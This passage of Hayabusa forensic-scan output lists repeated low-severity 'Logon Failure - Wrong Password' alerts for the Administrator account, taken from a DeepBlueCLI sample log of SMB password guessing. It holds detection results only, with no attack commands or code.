NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: 